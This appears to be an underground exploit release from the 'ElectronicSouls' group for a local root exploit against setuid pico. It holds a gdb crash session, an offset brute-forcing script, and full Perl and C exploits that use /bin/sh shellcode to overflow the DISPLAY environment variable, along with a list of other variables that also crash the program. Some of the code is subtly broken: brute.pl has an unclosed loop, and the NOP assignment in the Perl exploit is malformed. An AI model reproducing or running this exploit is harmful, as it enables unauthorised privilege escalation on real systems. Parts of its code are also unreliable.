PRIVATE! -- RESEARCH! -- PRIVATE! -- RESEARCH! -- PRIVATE!
            vux[vux@abv.bg]/ElectronicSouls

-- BUFFER OVERFLOW IN A LOT OF ENVIRONMENT VARIABLES USED BY PICO! --

READ IT AND KEEP IT PRIV8!
ON MANY SYSTEMS /usr/bin/pico IS SUID AND IT CAN BE EXPLOITED!
THE BUG I DISC0VERED IS IN ENVIRONMENT VARIABLE: DISPLAY (USED BY PICO TOO).
THE SAME BUG I FOUND IN OTHER ENV. VARS. USED BY PICO. I WILL LIST YOU SOON OTHERS.

THE DISCOVERING OF THE BUG AND WRITTING THE EXPLOIT WAS USED 5 TTY's! :>
I FINALLY WROTE THE 2 EXPLOITS, ESpico.c (C), ESpico.pl (PERL) ON TTY2!
DURING THIS TIME MY SYSTEM FUCKED UP BUT NOW IT'S OK!

NOT FOR KIDD0Z!!

[dx@linux:~]$ ls -l /usr/bin/pico
-rwsr-xr-x    1 root     root       .... /usr/bin/pico*
[dx@linux:~]$ export DISPLAY=`perl -e'{print "A"x"10232"}'`
[dx@linux:~]$ gdb /usr/bin/pico
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
(gdb) r `perl -e'print "A"x10240'`
Starting program: /usr/bin/pico `perl -e'print "A"x10240'`
[1;1H[H[J[7m   UW PICO(tm) 3.5                New Buffer                                    [27m[24;1H[K[25;1H[K[24;1H[7m^[27m[7mG[27m Get Help  [7m^[27m[7mO[27m WriteOut  [7m^[27m[7mR[27m Read File [7m^[27m[7mY[27m Prev Pg   [7m^[27m[7mK[27m Cut Text  [7m^[27m[7mC[27m Cur Pos   [K[25;1H[7m^[27m[7mX[27m Exit      [7m^[27m[7mJ[27m Justify   [7m^[27m[7mW[27m Where is  [7m^[27m[7mV[27m Next Pg   [7m^[27m[7mU[27m UnCut Text[7m^[27m[7mT[27m To Spell  [K[3;1H(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault. /*FEAR!!!!!!!!!*/
0x400bb063 in strcpy () from /lib/libc.so.6
(gdb) info reg
eax            0x8074741	134694721
ecx            0x48079a1b	1208457755
edx            0xbfffb5e5	-1073760795
ebx            0x8074753	134694739
esp            0xbfffab70	0xbfffab70
ebp            0xbfffaba8	0xbfffaba8
esi            0x8074703	134694659
edi            0xbffface7	-1073763097
eip            0x400bb063	0x400bb063
eflags         0x10282	66178
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x0	0
(gdb) q
The program is running.  Exit anyway? (y or n) 

I WROTE/USED BRUTE.PL TO GUESS THE OFFSET OF THE SPLOIT!

--brute.pl--
# change the $i value on line 3 if u don't want so big range.
#!/usr/bin/perl
for($i=-5000;$i<5000;$i++) {
print("trying offset: $i\n");
system("ulimit -c;./ESpico $i");
--brute.pl--

--ESpico.pl--                           } 
#!/usr/bin/perl

$sc = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
      "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
      "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
      "\xff\xff/bin/sh";

$nop = \x90;       # NOPS
$len = 10240;      # buffer
$ret = 0xbfffab70; # you must change it
$offset = -1000;   # huh, what's that?

if (@ARGV == 1) {
 $offset = $ARGV[0];
                }
for ($i = 0; $i < ($len -length($sc) - 100); $i++) {
 $buffer .= $nop;
                                                  }
$buffer .= $sc;
print ("addr: 0x", sprintf('%lx',($ret + $offset)), "\n");

$newret = pack('l', ($ret + $offset));

for ($i += length($sc); $i < $len; $i += 4) {
 $buffer .= $newret;
                                            }
local($ENV{'DISPLAY'}) = $buffer; 
exec("/usr/bin/pico");

--ESpico.pl--

--ESpico.c--
#include <stdio.h>

char sc[] =   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
              "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
              "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
              "\xff\xff/bin/sh";

#define NOP     0x90
#define BUF     10240
#define RET     0xbfffab70 // u must change it

int main(int argc, char *argv[]) {

    char buffer[BUF];
    long retaddr, offset;
    int i;

    offset = 0;
    if (argc > 1) {
	offset = atol(argv[1]);
    }
    retaddr = RET + offset;

    printf("\n\n\tKEEP IT PRIVATE!\n");
    printf("USAGE: %s [ofst] \n", argv[0]);
    printf("USING: retaddr: 0x%lx\n\n", retaddr);

    for (i = 0; i < BUF; i += 4)
	*(long *) &buffer[i] = retaddr;

    for (i = 0; i < (BUF - strlen(sc) - 100); ++i)
	*(buffer + i) = NOP;

    memcpy(buffer + i, sc, strlen(sc));

    setenv("DISPLAY", buffer, 1);
    execl("/usr/bin/pico", "pico", buffer, 0);

    return 0;
}
--ESpico.c--

AND THESE ARE THE ENV. VARS. THEY'RE MORE BUT I ADDED JUST THESE! IN THE EXPLOIT I WROTE IT USED 
DISPLAY!

/usr/bin/pico [buf:10240] ENV:MACHINE=[10232]       :SIGNAL 11
/usr/bin/pico [buf:10240] ENV:FTPSERVERPORT=[10226] :SIGNAL 11
/usr/bin/pico [buf:10240] ENV:FTP_PASSWORD=[10227]  :SIGNAL 11
/usr/bin/pico [buf:10240] ENV:MINUSKVAR=[10230]     :SIGNAL 11
/usr/bin/pico [buf:10240] ENV:DOS_KERNEL=[10229]    :SIGNAL 11

/*** ph33r! ***/

-vux